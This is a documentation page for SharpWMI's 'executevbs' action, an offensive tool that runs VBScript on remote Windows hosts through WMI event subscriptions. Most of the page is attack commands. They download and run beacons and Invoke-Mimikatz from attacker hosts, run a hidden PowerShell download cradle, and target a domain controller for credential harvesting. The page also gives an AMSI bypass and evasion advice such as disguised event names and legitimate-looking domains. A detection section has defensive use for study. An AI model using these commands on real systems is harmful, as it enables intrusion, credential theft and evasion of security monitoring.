Skip to main content

Overview

The executevbs action executes VBScript payloads through WMI event subscriptions using ActiveScriptEventConsumer. This provides a flexible method for remote code execution with support for downloading scripts, executing commands, and delayed triggers.
This action creates WMI event subscriptions that persist until cleaned up. SharpWMI automatically removes artifacts after execution, but failed operations may leave traces.

Syntax

SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=NAME] [amsi=disable] [trigger=SECONDS] [timeout=SECONDS] [username=DOMAIN\user] [password=Password]

Parameters

ParameterRequiredDescription
actionYesMust be executevbs
computernameNoTarget host(s), comma-separated
eventnameNoName for WMI event subscription. Default: “Debug”
triggerNoSeconds before script executes. Default: 10
timeoutNoScript kill timeout in seconds. Default: 12
amsiNoSet to disable to bypass AMSI
usernameNoUsername for authentication
passwordNoPassword for authentication

Script Specification Methods

SharpWMI offers 8 different methods to specify VBScript payloads:

Method A: Execute Command via VBScript

Execute an OS command through preset VBScript template: 
SharpWMI.exe action=executevbs computername=target.domain.com command="notepad.exe" eventname="Update"
The VBScript template: 
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & computer & "\root\cimv2")
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create "COMMAND", Null, conf, intProcessID

Method B: Download PowerShell Script and Execute

Download PowerShell from URL and execute via stdin: 
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/Invoke-Mimikatz.ps1" eventname="Update"
The VBScript downloads the script and pipes it to PowerShell’s stdin.

Method C: Download Binary and Execute

Download binary, save to disk, and execute: 
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/beacon.exe,%TEMP%\update.exe" eventname="Update"
Format: url="SOURCE_URL,TARGET_PATH"

Method D: Download Binary and Execute Custom Command

Download binary and execute with custom parameters: 
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/payload.exe,%TEMP%\svc.exe" command="%TEMP%\svc.exe -c 192.168.1.100" eventname="Update"

Method E: Execute VBScript from File

Read VBScript from file and execute: 
SharpWMI.exe action=executevbs computername=target.domain.com script="C:\payloads\script.vbs" eventname="Update"

Method F: Execute Inline VBScript

Execute VBScript code directly: 
SharpWMI.exe action=executevbs computername=target.domain.com script="CreateObject(\"WScript.Shell\").Run(\"notepad.exe\")" eventname="Update"

Method G: Execute Base64-Encoded VBScript

Base64-decode and execute VBScript: 
SharpWMI.exe action=executevbs computername=target.domain.com scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuKCJub3RlcGFkLmV4ZSIp" eventname="Update"

Method H: Execute Base64-Encoded Script from File

Read base64-encoded VBScript from file: 
SharpWMI.exe action=executevbs computername=target.domain.com scriptb64="C:\payloads\script.vbs.b64" eventname="Update"

Usage Examples

Basic VBScript Execution

SharpWMI.exe action=executevbs computername=target.domain.com command="notepad.exe" eventname="MyEvent"

Download and Execute Scenarios

SharpWMI.exe action=executevbs computername=target.domain.com url="http://192.168.1.100/Invoke-Mimikatz.ps1" eventname="WindowsUpdate" amsi=disable

Advanced VBScript Usage

SharpWMI.exe action=executevbs computername=target.domain.com script="CreateObject(\"WScript.Shell\").Run(\"cmd /c whoami > C:\temp\out.txt\")" eventname="Debug"

How It Works

1

Create Timer Object

Creates __IntervalTimerInstruction to trigger after specified delay
2

Create Event Filter

Sets up __EventFilter to monitor for timer events
3

Create Event Consumer

Creates ActiveScriptEventConsumer with VBScript payload
4

Bind Filter to Consumer

Creates __FilterToConsumerBinding to link filter and consumer
5

Wait for Execution

Waits for trigger time (default 10 seconds)
6

Cleanup

Removes timer, filter, consumer, and binding
The execution flow:
  1. __IntervalTimerInstruction fires after trigger seconds
  2. __EventFilter matches the timer event
  3. ActiveScriptEventConsumer executes VBScript
  4. Script runs with KillTimeout of timeout seconds
  5. All WMI objects are deleted after execution
This leaves minimal artifacts compared to persistent WMI backdoors.

Timing Parameters

  • Default Timing
  • Fast Execution
  • Delayed Execution
# Default: trigger after 10 seconds, timeout after 12 seconds
SharpWMI.exe action=executevbs computername=target command="notepad.exe"
Script executes 10 seconds after subscription creation.
timeout should always be greater than trigger to allow the script to execute before being killed.

Operational Scenarios

Scenario 1: Stealthy Beacon Deployment

# Download and execute beacon with delay
SharpWMI.exe action=executevbs computername=target.domain.com url="http://192.168.1.100/beacon.exe,%TEMP%\WindowsUpdate.exe" eventname="WindowsUpdate" trigger=30 timeout=40 amsi=disable username="DOMAIN\admin" password="Password123!"

Scenario 2: Credential Harvesting

# Download and execute Mimikatz
SharpWMI.exe action=executevbs computername=dc.domain.com url="http://192.168.1.100/Invoke-Mimikatz.ps1" eventname="SecurityUpdate" amsi=disable trigger=10 timeout=60

Scenario 3: Custom VBScript Payload

# Execute custom VBScript for lateral movement
$vbs = @'
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')"
'@

SharpWMI.exe action=executevbs computername=target.domain.com script="$vbs" eventname="Update" amsi=disable

Scenario 4: Multiple Target Execution

# Execute across multiple systems
SharpWMI.exe action=executevbs computername=ws01,ws02,ws03,ws04 url="http://192.168.1.100/script.ps1" eventname="Maintenance" amsi=disable trigger=5 timeout=15

Remote vs Local Usage

  • Local Execution
  • Remote Execution
# Execute on localhost (rarely used)
SharpWMI.exe action=executevbs command="notepad.exe" eventname="Test"
Note: Local execution via WMI event subscriptions is uncommon. Use exec action for local commands.

AMSI Evasion

When amsi=disable is specified:
1

Registry Modification

Sets HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable to 0
2

VBScript Execution

VBScript runs with AMSI disabled
3

Registry Restoration

Original AMSI value is restored after cleanup
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/script.ps1" eventname="Update" amsi=disable

Detection Considerations

WMI event subscriptions are a high-fidelity indicator of malicious activity and are heavily monitored.
  • Event ID 5858: WMI permanent event subscription
  • Event ID 5859: WMI event filter activity
  • Event ID 5861: WMI event consumer registration
  • Sysmon Event ID 19: WMI event filter activity
  • Sysmon Event ID 20: WMI event consumer activity
  • Sysmon Event ID 21: WMI event consumer to filter binding
  • wscript.exe or cscript.exe spawned by scrcons.exe
  • Parent process: scrcons.exe (Script Event Consumer)
  • Event ID 4688: Process creation with suspicious parent
  • ActiveScriptEventConsumer with encoded scripts
  • WMI queries to root\subscription namespace
  • Creation of __EventFilter, ActiveScriptEventConsumer, __FilterToConsumerBinding
  • Multiple WMI connections in succession
  • DCOM traffic patterns consistent with WMI operations
  • Registry modification to AmsiEnable key
  • Event ID 4657: Registry value modification
  • Temporary AMSI bypass in user context

Best Practices

Event Naming

  • Use legitimate-sounding event names
  • Avoid obvious names like “Backdoor” or “Shell”
  • Use Windows Update, Maintenance, Debug
  • Randomize names across operations

Timing Strategy

  • Use delays to avoid immediate detection
  • Allow time to disconnect before execution
  • Set appropriate timeout values
  • Don’t use excessively long delays

Payload Delivery

  • Use HTTPS for downloads when possible
  • Host payloads on legitimate-looking domains
  • Use URL shorteners or redirectors
  • Verify downloads with checksums in VBScript

Cleanup

  • Let SharpWMI handle automatic cleanup
  • Verify subscriptions are removed
  • Check for orphaned event consumers
  • Monitor for failed cleanup operations

Comparison with exec Action

Featureexecutevbsexec
Execution MethodWMI Event SubscriptionWin32_Process.Create
TimingDelayed (configurable)Immediate
Payload TypeVBScriptCommand line
ArtifactsEvent subscriptionsProcess creation
ComplexityHigherLower
FlexibilityVery highModerate
Detection RiskHigher (event subs monitored)Moderate
Use CaseComplex payloads, downloadsSimple commands

Troubleshooting

Cause: WMI permissions or service issueSolution:
  • Verify WMI service is running
  • Check admin privileges
  • Test with local WMI query first
  • Verify root\cimv2 namespace access
Cause: Subscription namespace access deniedSolution:
  • Ensure admin rights on target
  • Check root\subscription namespace permissions
  • Verify WMI filter quota not exceeded
  • Try different event name
Cause: Timeout too short or script errorSolution:
  • Increase timeout parameter
  • Test VBScript locally first
  • Check for syntax errors
  • Verify URLs are accessible from target
Cause: Insufficient privileges or EDR blockingSolution:
  • Verify admin context
  • Check for EDR protecting registry
  • Try alternative AMSI bypass
  • Test registry modification manually

exec

Simpler command execution method

upload

Upload files before VBS execution

query

Verify event subscriptions

ps

Check for script execution

Additional Resources

# List event filters
SharpWMI.exe action=query query="SELECT Name,Query FROM __EventFilter" namespace="root\subscription"

# List event consumers
SharpWMI.exe action=query query="SELECT Name,ScriptText FROM ActiveScriptEventConsumer" namespace="root\subscription"

# List bindings
SharpWMI.exe action=query query="SELECT Filter,Consumer FROM __FilterToConsumerBinding" namespace="root\subscription"

# Remove event filter
Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='EventName'" | Remove-WmiObject

# Remove event consumer
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer -Filter "Name='EventName'" | Remove-WmiObject

# Remove binding
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object { $_.Filter -match 'EventName' } | Remove-WmiObject